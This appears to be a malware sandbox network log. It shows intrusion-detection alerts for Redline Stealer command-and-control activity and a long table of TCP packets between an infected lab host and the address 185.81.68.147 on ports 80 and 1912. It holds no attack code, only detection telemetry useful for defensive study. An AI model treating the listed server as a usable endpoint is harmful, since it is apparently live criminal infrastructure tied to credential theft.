2024-12-17T10:15:20.799615+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:21.240256+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:22.794899+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:23.245593+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:23.685906+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:24.159621+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.528095007 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532454014 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532510042 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532557964 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.536931038 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.537074089 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.537122011 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541645050 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541856050 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541939020 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546056032 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546099901 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546468019 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550570965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550654888 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550875902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555079937 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555166006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555598021 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559588909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559623957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559691906 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564122915 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564229012 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564495087 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568702936 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568850994 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568906069 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685105085 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685224056 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685731888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687175035 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687330961 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687490940 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690640926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690834999 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690881968 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.694224119 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.694328070 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.695838928 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.697798967 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.697887897 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.699209929 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701400042 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701483965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701567888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.704866886 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.704955101 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.705070019 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708456993 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708470106 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708632946 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.711950064 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.712199926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.712645054 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.715333939 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.715459108 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.716238976 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.718882084 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.718941927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.720880985 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.722392082 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.722491026 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725169897 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725847006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725996971 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.728537083 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.729319096 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.729455948 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.730422020 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.732904911 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.733027935 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.733181953 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736399889 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736504078 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736792088 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740200043 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740257978 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740765095 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743702888 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743748903 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743874073 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.746898890 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.746990919 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.747065067 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750400066 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750471115 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750536919 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.753918886 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.754009008 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.754441023 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757390022 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757505894 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757693052 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.760967016 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.761147976 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.761456966 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.764417887 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.966511965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.966600895 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.968401909 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.968935966 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.969033957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971457005 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971518993 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971656084 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.971719027 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.973858118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.973943949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.975991964 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.976298094 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.976412058 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.977771997 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.978724003 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.978826046 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.980077028 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981184959 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981287003 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.981431961 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983643055 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983745098 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.983947039 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986325979 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986464977 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.986577988 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988517046 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988574028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.988645077 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.991044998 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.991136074 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.992173910 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.993431091 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.993624926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995837927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995889902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.995980024 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.996036053 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998296976 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998368979 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.998447895 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000798941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000821114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.000874996 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.003247023 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.003289938 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.004057884 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.005713940 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.005904913 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008106947 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008189917 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008193016 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.008388996 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010512114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010584116 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.010664940 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069262028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069380045 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.069439888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070171118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070641041 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070732117 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.070795059 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072565079 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072621107 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.072654963 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074568033 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074632883 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074639082 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074687958 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.074807882 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.196033955 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.214409113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335779905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335921049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.335921049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:03.455713034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.209059000 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.328949928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.329134941 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.339333057 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.459204912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677186012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677208900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677226067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677237988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677249908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677261114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677280903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677280903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677355051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677360058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677381039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677393913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677428961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677428961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.797489882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.314785957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318562984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318711996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.318842888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322724104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322808027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.322927952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.326838970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.326931953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.327052116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331010103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331110954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.331325054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335177898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335329056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.335788965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339339018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339420080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.339713097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343580008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343713999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.343862057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.347881079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.348040104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.348234892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.351877928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.351980925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.352170944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356033087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356127024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.356293917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360215902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360297918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.360457897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448020935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448065042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.448540926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.449712038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.449856043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.450753927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453151941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453262091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.453980923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.456943035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.457026005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.457309008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460246086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460325003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.460491896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.463393927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.463464975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.464087009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466708899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466789007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.466943026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470175028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470206976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.470521927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473033905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473140001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.473445892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476479053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476594925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.476728916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479372978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479512930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.479664087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482167006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482289076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.482358932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.485153913 CET8049709185.81.68.147192.168.2.8
